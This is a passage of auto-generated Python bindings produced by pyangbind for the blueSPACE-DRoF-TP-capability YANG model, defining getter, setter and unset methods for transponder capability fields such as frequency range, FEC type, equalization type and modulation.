Setter method for adjustment_granularity, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/adjustment_granularity (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_adjustment_granularity is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_adjustment_granularity() directly.
YANG Description: e.g 6.25GHz
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="adjustment-granularity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """adjustment_granularity must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="adjustment-granularity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
})
self.__adjustment_granularity = t
if hasattr(self, '_set'):
self._set()
def _unset_adjustment_granularity(self):
self.__adjustment_granularity = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="adjustment-granularity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
def _get_grid_type(self):
"""
Getter method for grid_type, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/grid_type (string)
YANG Description: e.g Flex
"""
return self.__grid_type
def _set_grid_type(self, v, load=False):
"""
Setter method for grid_type, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/grid_type (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_grid_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_grid_type() directly.
YANG Description: e.g Flex
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="grid-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """grid_type must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="grid-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
})
self.__grid_type = t
if hasattr(self, '_set'):
self._set()
def _unset_grid_type(self):
self.__grid_type = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="grid-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
def _get_lower_frequency(self):
"""
Getter method for lower_frequency, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/lower_frequency (string)
YANG Description: e.g 191.494THz
"""
return self.__lower_frequency
def _set_lower_frequency(self, v, load=False):
"""
Setter method for lower_frequency, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/lower_frequency (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lower_frequency is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lower_frequency() directly.
YANG Description: e.g 191.494THz
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="lower-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lower_frequency must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="lower-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
})
self.__lower_frequency = t
if hasattr(self, '_set'):
self._set()
def _unset_lower_frequency(self):
self.__lower_frequency = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="lower-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
def _get_upper_frequency(self):
"""
Getter method for upper_frequency, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/upper_frequency (string)
YANG Description: e.g 195,256THz
"""
return self.__upper_frequency
def _set_upper_frequency(self, v, load=False):
"""
Setter method for upper_frequency, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/upper_frequency (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_upper_frequency is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_upper_frequency() directly.
YANG Description: e.g 195,256THz
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="upper-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """upper_frequency must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="upper-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
})
self.__upper_frequency = t
if hasattr(self, '_set'):
self._set()
def _unset_upper_frequency(self):
self.__upper_frequency = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="upper-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
adjustment_granularity = __builtin__.property(_get_adjustment_granularity)
grid_type = __builtin__.property(_get_grid_type)
lower_frequency = __builtin__.property(_get_lower_frequency)
upper_frequency = __builtin__.property(_get_upper_frequency)
_pyangbind_elements = OrderedDict([('adjustment_granularity', adjustment_granularity), ('grid_type', grid_type), ('lower_frequency', lower_frequency), ('upper_frequency', upper_frequency), ])
class yc_supportable_FEC_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_FEC(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module blueSPACE-DRoF-TP-capability - based on the path /DRoF-TP-capability/supportable-FEC. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_path_helper', '_extmethods', '__fec_id','__fec_type',)
_yang_name = 'supportable-FEC'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__fec_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="fec-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
self.__fec_type = YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="fec-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['DRoF-TP-capability', 'supportable-FEC']
def _get_fec_id(self):
"""
Getter method for fec_id, mapped from YANG variable /DRoF_TP_capability/supportable_FEC/fec_id (string)
"""
return self.__fec_id
def _set_fec_id(self, v, load=False):
"""
Setter method for fec_id, mapped from YANG variable /DRoF_TP_capability/supportable_FEC/fec_id (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_fec_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_fec_id() directly.
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="fec-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """fec_id must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="fec-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
})
self.__fec_id = t
if hasattr(self, '_set'):
self._set()
def _unset_fec_id(self):
self.__fec_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="fec-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
def _get_fec_type(self):
"""
Getter method for fec_type, mapped from YANG variable /DRoF_TP_capability/supportable_FEC/fec_type (identityref)
"""
return self.__fec_type
def _set_fec_type(self, v, load=False):
"""
Setter method for fec_type, mapped from YANG variable /DRoF_TP_capability/supportable_FEC/fec_type (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_fec_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_fec_type() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="fec-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """fec_type must be of a type compatible with identityref""",
'defined-type': "blueSPACE-DRoF-TP-capability:identityref",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="fec-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)""",
})
self.__fec_type = t
if hasattr(self, '_set'):
self._set()
def _unset_fec_type(self):
self.__fec_type = YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:HD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'SD-FEC': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="fec-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
fec_id = __builtin__.property(_get_fec_id)
fec_type = __builtin__.property(_get_fec_type)
_pyangbind_elements = OrderedDict([('fec_id', fec_id), ('fec_type', fec_type), ])
class yc_supportable_equalization_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_equalization(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module blueSPACE-DRoF-TP-capability - based on the path /DRoF-TP-capability/supportable-equalization. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_path_helper', '_extmethods', '__equalization_id','__equalization_type',)
_yang_name = 'supportable-equalization'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__equalization_type = YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="equalization-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
self.__equalization_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="equalization-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['DRoF-TP-capability', 'supportable-equalization']
def _get_equalization_id(self):
"""
Getter method for equalization_id, mapped from YANG variable /DRoF_TP_capability/supportable_equalization/equalization_id (string)
"""
return self.__equalization_id
def _set_equalization_id(self, v, load=False):
"""
Setter method for equalization_id, mapped from YANG variable /DRoF_TP_capability/supportable_equalization/equalization_id (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_equalization_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_equalization_id() directly.
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="equalization-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """equalization_id must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="equalization-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
})
self.__equalization_id = t
if hasattr(self, '_set'):
self._set()
def _unset_equalization_id(self):
self.__equalization_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="equalization-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
def _get_equalization_type(self):
"""
Getter method for equalization_type, mapped from YANG variable /DRoF_TP_capability/supportable_equalization/equalization_type (identityref)
"""
return self.__equalization_type
def _set_equalization_type(self, v, load=False):
"""
Setter method for equalization_type, mapped from YANG variable /DRoF_TP_capability/supportable_equalization/equalization_type (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_equalization_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_equalization_type() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="equalization-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """equalization_type must be of a type compatible with identityref""",
'defined-type': "blueSPACE-DRoF-TP-capability:identityref",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="equalization-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)""",
})
self.__equalization_type = t
if hasattr(self, '_set'):
self._set()
def _unset_equalization_type(self):
self.__equalization_type = YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'ZF': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:MMSE': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="equalization-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
equalization_id = __builtin__.property(_get_equalization_id)
equalization_type = __builtin__.property(_get_equalization_type)
_pyangbind_elements = OrderedDict([('equalization_id', equalization_id), ('equalization_type', equalization_type), ])
class yc_DRoF_TP_capability_blueSPACE_DRoF_TP_capability__DRoF_TP_capability(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module blueSPACE-DRoF-TP-capability - based on the path /DRoF-TP-capability. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_path_helper', '_extmethods', '__supportable_capacity','__supportable_modulation','__supportable_subcarriers','__supportable_constellation','__supportable_nominal_central_frequency_range','__supportable_bandwidth','__supportable_FEC','__supportable_equalization',)
_yang_name = 'DRoF-TP-capability'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__supportable_modulation = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="supportable-modulation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
self.__supportable_subcarriers = YANGDynClass(unique=True, base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="supportable-subcarriers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
self.__supportable_FEC = YANGDynClass(base=YANGListType("fec_id",yc_supportable_FEC_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_FEC, yang_name="supportable-FEC", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-id', extensions=None), is_container='list', yang_name="supportable-FEC", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
self.__supportable_constellation = YANGDynClass(base=YANGListType("constellation_id",yc_supportable_constellation_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_constellation, yang_name="supportable-constellation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='constellation-id', extensions=None), is_container='list', yang_name="supportable-constellation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
self.__supportable_capacity = YANGDynClass(base=yc_supportable_capacity_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_capacity, is_container='container', yang_name="supportable-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)
self.__supportable_bandwidth = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="supportable-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
self.__supportable_nominal_central_frequency_range = YANGDynClass(base=yc_supportable_nominal_central_frequency_range_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_nominal_central_frequency_range, is_container='container', yang_name="supportable-nominal-central-frequency-range", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)
self.__supportable_equalization = YANGDynClass(base=YANGListType("equalization_id",yc_supportable_equalization_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_equalization, yang_name="supportable-equalization", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='equalization-id', extensions=None), is_container='list', yang_name="supportable-equalization", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['DRoF-TP-capability']
def _get_supportable_capacity(self):
"""
Getter method for supportable_capacity, mapped from YANG variable /DRoF_TP_capability/supportable_capacity (container)
"""
return self.__supportable_capacity
def _set_supportable_capacity(self, v, load=False):
"""
Setter method for supportable_capacity, mapped from YANG variable /DRoF_TP_capability/supportable_capacity (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_supportable_capacity is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_supportable_capacity() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=yc_supportable_capacity_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_capacity, is_container='container', yang_name="supportable-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """supportable_capacity must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=yc_supportable_capacity_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_capacity, is_container='container', yang_name="supportable-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)""",
})
self.__supportable_capacity = t
if hasattr(self, '_set'):
self._set()
def _unset_supportable_capacity(self):
self.__supportable_capacity = YANGDynClass(base=yc_supportable_capacity_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_capacity, is_container='container', yang_name="supportable-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)
def _get_supportable_modulation(self):
"""
Getter method for supportable_modulation, mapped from YANG variable /DRoF_TP_capability/supportable_modulation (string)
YANG Description: e.g. OFDM
"""
return self.__supportable_modulation
def _set_supportable_modulation(self, v, load=False):
"""
Setter method for supportable_modulation, mapped from YANG variable /DRoF_TP_capability/supportable_modulation (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_supportable_modulation is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_supportable_modulation() directly.
YANG Description: e.g. OFDM
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="supportable-modulation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """supportable_modulation must be of a type compatible with string""",
'defined-type': "string",
